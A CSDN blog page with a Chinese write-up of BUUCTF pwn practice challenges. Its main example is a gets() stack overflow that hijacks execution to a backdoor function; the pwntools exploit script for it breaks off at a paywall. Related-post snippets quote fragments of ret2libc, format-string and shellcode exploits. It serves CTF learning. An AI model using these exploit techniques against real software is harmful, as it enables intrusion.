BUUCTF pwn wp 1 - 5

最新推荐文章于 2024-09-01 23:26:39 发布

原创

最新推荐文章于 2024-09-01 23:26:39 发布 · 405 阅读

1 ·

CC 4.0 BY-SA版权

本文介绍通过栈溢出漏洞攻击获取隐藏的Flag信息的方法。针对不同程序利用栈溢出特性，构造特定payload，实现对目标函数的劫持，从而执行敏感操作如读取flag文件。

test_your_nc

在这里插入图片描述

nc node3.buuoj.cn 29066

在这里插入图片描述

rip

在这里插入图片描述
s ← argv
直接输入一个字符串, gets()栈溢出

在这里插入图片描述

返回到后门函数fun().

因为是Ubuntu18, 考虑被调用函数负责堆栈平衡, 所以劫持函数流时需要pop一下, 或者调用system函数时不能push rbp. 所以劫持到0x401187, 跳过push rbp.

from pwn import *

context.arch = "amd64"
sel = 1
io = remote('node3.buuoj.cn', 28767) if sel == 0 else process('./pwn1')

pad = 0x0F
fun_addr = 0x0000000000401187

# io.recvline()
payload = cyclic(pad

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

fa1c4

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【PWN系列】 Buucf babyheap_0ctf_2017 Writeup

Vicl1fe的博客

11-27

792

个人博客地址 http://www.darkerbox.com 欢迎大家学习交流参考网址： https://www.cnblogs.com/luoleqi/p/12349714.html 分析参考网址说的已经不错了，主要问题出现在fill功能，只要chunk存在，即可写任意长度的字符。主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。这里我来实际走一遍exp的流程，下面的exp我用的是本地的libc。利用下面的代码定

[BUUCTF-pwn]——x_ctf_b0verfl0w

Y_peak的博客

03-27

795

[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型，利用栈溢出，构造循环调用第一次leek地址，之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF-PWN-Writeup-1-5

feng的博客

01-20

3483

前言开始刷一刷Buuctf的PWN题，一遍学一遍刷题了。其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点，太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。一个gets的栈溢出，后门函数fun()在0x401186，本

buuctf-pwn write-ups (1)

CoLin的pwn小屋

05-01

536

buuctf-pwn 001-016题wp

BUUCTF刷题之路-ciscn_2019_c_11

qq_30528603的博客

05-29

553

因为程序走到这时puts函数已经执行过了，got表里面填充的就是puts函数的真实地址，因此我们再次调用一次puts函数并把puts的got表的内容当做参数传给puts函数，所以程序会去puts_plt去执行puts函数，并把puts函数的真实地址打印出来。我们分析这里是做什么的，得到了puts_addr这个puts函数的真实地址，减去puts在libc的偏移得到Libc加载的真实基地址，然后利用基地址加上system函数的偏移得到system函数的真实地址。这是个64位的程序，没有开启金丝雀和PIE。

buuctf-pwn write-ups (4)

CoLin的pwn小屋

06-12

593

buuctf 032-038题题解，重点关注038题 pwnable_orw

buuctf-pwn write-ups (2)

CoLin的pwn小屋

05-07

359

buuctf-pwn 017-026题wp，重点关注babyheap

BUUCTF pwn wp 116 - 120

fa1c4的blog

03-06

493

[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4

BUUCTF PWN wp--[第五空间2019 决赛]PWN5

最新发布

2302_81740139的博客

09-01

1122

在这个上下文中，%10$n表示写入的值将是printf的第10个参数，但由于p32(0x804C044)没有在printf调用中作为参数，它实际上利用了格式化字符串漏洞，将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示，这里转换的是地址0x804C044，这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量，其地址是硬编码的（例如，在ELF文件中，地址可能是一个固定的地址）。如果之前的利用成功，这将提供一个shell。

BUUCTF pwn wp 131 - 135

fa1c4的blog

04-27

687

rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap

BUUCTF PWN wp--ciscn_2019_n_1

2302_81740139的博客

08-25

493

得到gets缓冲区的范围大小。用垃圾数据填充v1（如上图箭头为0x30+0x8），溢出v2，覆盖到下方的system函数，转换到cat/flag的地址0x4006BE。第二步进入主函数，发现func，main函数调用了func，func中存在经典gets()漏洞，我们看到本题是v2数组在做比较。第一步 checksec，并检查该题的保护机制。第三步编写脚本。

buuctf-pwn write-ups (3)

CoLin的pwn小屋

05-15

347

buuctf pwn 027-031题

buuctf-pwn write-ups (5)

CoLin的pwn小屋

06-17

363

buuctf-pwn 039~046题

buuctf-pwn write-ups (6)

CoLin的pwn小屋

06-24

1228

buuctf-pwn 047~053题，重点关注第53题的C++ pwn

buuctf-pwn write-ups (9)

CoLin的pwn小屋

07-04

317

buuctf-pwn 067~072题题解

BUUCTF：[Black Watch 入群题]PWN（write up）

qq_44768749的博客

08-23

1049

BUUCTF：[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析开启了栈不可执行 0x02 运行运行一下没什么特殊的，猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址，但s在bss段，而且输入的长度也够长，因此想到了栈迁移，覆盖vul_function返回地址，使其到bss段上执行 0x04 思路 s在bss段上的地址为0

[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup

Csome

05-21

661

解题 checksec 先checksec一下，发现没有开canary方便了栈溢出，PIE也没开反编译 IDA反编译 main函数 get_secret函数分析利用程序先进入main函数，有一个gets（无限长度的栈溢出） get_secret函数是将flag.txt读入bss段中，并没有做输出的操作思路：，在main函数中修改main函数的返回地址，返回到get_secret函数中，读取flag，再返回到mian函数中（第二次进入main函数），修改返回地址为printf的地址，传入flag

buuctf [第五空间2019 决赛]PWN5 writeup

yajuanpi4899的博客

01-16

2215

一、题目速阅拿到题目，进行check 得到信息，可知开启了金丝雀，32位 IDA进行反编译：题目分析：该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对，如果相等则执行system("/bin/sh")，确认payload目标：使第二次值相等，而可以看到printf中有格式化字符串，根据此构建payload。二、知识要点格式化字符串漏洞：利用常用方式检索字符在栈上偏移量：如图所示，41414141即AAAA，可以看到距离AAAA偏移10位可..

[BUUCTF-pwn]——pwnable_orw 　　（ORW）

Y_peak的博客

03-16

1596

[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题，所谓orw就是指你的系统调用被禁止了，不能通过子进程去获得权限和flag，只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools，来查看注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she

BUUCTF pwn rip

01-28

根据提供的引用内容，BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解，可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址，通过控制RIP寄存器的值，可以改变程序的执行流程，从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中，攻击者通常会利用程序中的漏洞，通过输入特定的数据来改变程序的执行流程，从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧，帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣，可以阅读该文章以获取更多详细信息。